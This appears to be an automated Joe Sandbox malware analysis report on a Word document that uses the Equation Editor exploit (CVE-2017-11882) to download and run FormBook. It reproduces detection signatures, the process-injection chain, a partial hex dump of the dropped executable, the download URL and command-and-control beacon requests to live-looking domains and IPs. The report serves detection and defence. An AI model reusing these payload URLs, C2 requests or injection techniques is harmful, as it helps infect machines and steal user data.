Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report VOMAXTRADING.doc

Overview

General Information

Sample Name:VOMAXTRADING.doc
Analysis ID:323039
MD5:30244581b41accd77dab936571e0d87e
SHA1:46ddb3fa250dfb4808c3a43f7846d7c643a4f325
SHA256:2664162d0341d8e5cf1cf3a290b77406d87111e3c9ff3fcf3a4f0836d15d3afe
Tags:doc

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1776 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2372 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • skypound83892.exe (PID: 1520 cmdline: C:\Users\user\AppData\Roaming\skypound83892.exe MD5: EF8FC92D8B47C1F40DD5233AA9B3F260)
      • skypound83892.exe (PID: 960 cmdline: C:\Users\user\AppData\Roaming\skypound83892.exe MD5: EF8FC92D8B47C1F40DD5233AA9B3F260)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • firefos.exe (PID: 2992 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe' MD5: EF8FC92D8B47C1F40DD5233AA9B3F260)
            • firefos.exe (PID: 2336 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe MD5: EF8FC92D8B47C1F40DD5233AA9B3F260)
          • firefos.exe (PID: 2872 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe' MD5: EF8FC92D8B47C1F40DD5233AA9B3F260)
            • firefos.exe (PID: 2840 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe MD5: EF8FC92D8B47C1F40DD5233AA9B3F260)
          • NAPSTAT.EXE (PID: 2016 cmdline: C:\Windows\SysWOW64\NAPSTAT.EXE MD5: 4AF92E1821D96E4178732FC04D8FD69C)
            • cmd.exe (PID: 172 cmdline: /c del 'C:\Users\user\AppData\Roaming\skypound83892.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • EQNEDT32.EXE (PID: 2804 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      16.2.firefos.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        16.2.firefos.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        16.2.firefos.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        15.2.firefos.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          15.2.firefos.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\skypound83892.exe, CommandLine: C:\Users\user\AppData\Roaming\skypound83892.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\skypound83892.exe, NewProcessName: C:\Users\user\AppData\Roaming\skypound83892.exe, OriginalFileName: C:\Users\user\AppData\Roaming\skypound83892.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2372, ProcessCommandLine: C:\Users\user\AppData\Roaming\skypound83892.exe, ProcessId: 1520
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 104.168.198.45, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2372, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2372, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\skypoundx[1].exe

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for submitted fileShow sources
          Source: VOMAXTRADING.docVirustotal: Detection: 43%Perma Link
          Source: VOMAXTRADING.docReversingLabs: Detection: 39%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2389888753.0000000000280000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.2299563843.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2203049931.0000000000330000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2203016993.0000000000300000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 16.2.firefos.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.firefos.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.skypound83892.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.skypound83892.exe.400000.1.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\skypoundx[1].exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeJoe Sandbox ML: detected
          Source: 15.2.firefos.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 16.2.firefos.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.2.skypound83892.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\skypound83892.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeFile opened: C:\Users\user\AppData\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeFile opened: C:\Users\user\
          Source: global trafficDNS query: name: sea-shared-5.masterns.com
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.198.45:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.168.198.45:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.22:49170
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Nov 2020 07:44:06 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Thu, 26 Nov 2020 01:10:37 GMTAccept-Ranges: bytesContent-Length: 278528Vary: Accept-EncodingKeep-Alive: timeout=5, max=10000Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5c ff be 5f 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 f2 03 00 00 4c 00 00 00 00 00 00 be 10 04 00 00 20 00 00 00 20 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 04 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 10 04 00 57 00 00 00 00 20 04 00 38 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 f0 03 00 00 20 00 00 00 f2 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 38 49 00 00 00 20 04 00 00 4a 00 00 00 f4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 04 00 00 02 00 00 00 3e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 10 04 00 00 00 00 00 48 00 00 00 02 00 05 00 6c ed 03 00 f8 22 00 00 03 00 00 00 43 00 00 06 e8 30 00 00 84 bc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 17 1e 2d 08 26 28 13 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 09 00 1d 00 00 00 00 00 00 00 73 01 00 00 06 28 14 00 00 0a 74 02 00 00 02 1e 2d 03 26 2b 07 80 01 00 00 04 2b 00 2a 00 00 00 1a 7e 01 00 00 04 2a 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 16 1d 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 19 1b 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1a 1b 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1e 17 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1d 18 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1e 1a 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 18 17 2d 08 26 28 15 00 00 0a 2b 03 26
          Source: global trafficHTTP traffic detected: GET /bu43/?OBZPd=k6AhchXHBB&Yzrx=UiBHsTvAEQLKMdFr/hj1g9PdhtcWl8ZZ/ysXuG6Tr8ng0KhPmhT7mwdkGkewJ6JbNyjYEA== HTTP/1.1Host: www.opel-occasions-ales.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bu43/?Yzrx=5vpVtqJ3i14TYLjahre3JpaYS6Wcf4IPAkG7pj5paeEEzi6lwzUZWwRsk9qYR19+9CpDRA==&OBZPd=k6AhchXHBB HTTP/1.1Host: www.runwithit.mediaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bu43/?OBZPd=k6AhchXHBB&Yzrx=5Lfh6qcZO6QCpL41ah3mk8LUL3OJ/OZx9c26bzra2u0GgF5XtbJN8WKHQCrI7u2LEBkhnA== HTTP/1.1Host: www.mycapecrusade.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.49.23.141 198.49.23.141
          Source: Joe Sandbox ViewASN Name: HOSTWINDSUS HOSTWINDSUS
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: global trafficHTTP traffic detected: GET /~vhlcnlog/ugopoundx/skypoundx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sea-shared-5.masterns.comConnection: Keep-Alive
          Source: C:\Windows\explorer.exeCode function: 7_2_02933302 getaddrinfo,setsockopt,recv,
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B65885D3-1CF8-4E74-AA78-05F4F57053A0}.tmpJump to behavior
          Source: global trafficHTTP traffic detected: GET /~vhlcnlog/ugopoundx/skypoundx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sea-shared-5.masterns.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bu43/?OBZPd=k6AhchXHBB&Yzrx=UiBHsTvAEQLKMdFr/hj1g9PdhtcWl8ZZ/ysXuG6Tr8ng0KhPmhT7mwdkGkewJ6JbNyjYEA== HTTP/1.1Host: www.opel-occasions-ales.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bu43/?Yzrx=5vpVtqJ3i14TYLjahre3JpaYS6Wcf4IPAkG7pj5paeEEzi6lwzUZWwRsk9qYR19+9CpDRA==&OBZPd=k6AhchXHBB HTTP/1.1Host: www.runwithit.mediaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bu43/?OBZPd=k6AhchXHBB&Yzrx=5Lfh6qcZO6QCpL41ah3mk8LUL3OJ/OZx9c26bzra2u0GgF5XtbJN8WKHQCrI7u2LEBkhnA== HTTP/1.1Host: www.mycapecrusade.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000007.00000000.2144811362.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: sea-shared-5.masterns.com
          Source: explorer.exe, 00000007.00000000.2189757519.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189757519.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
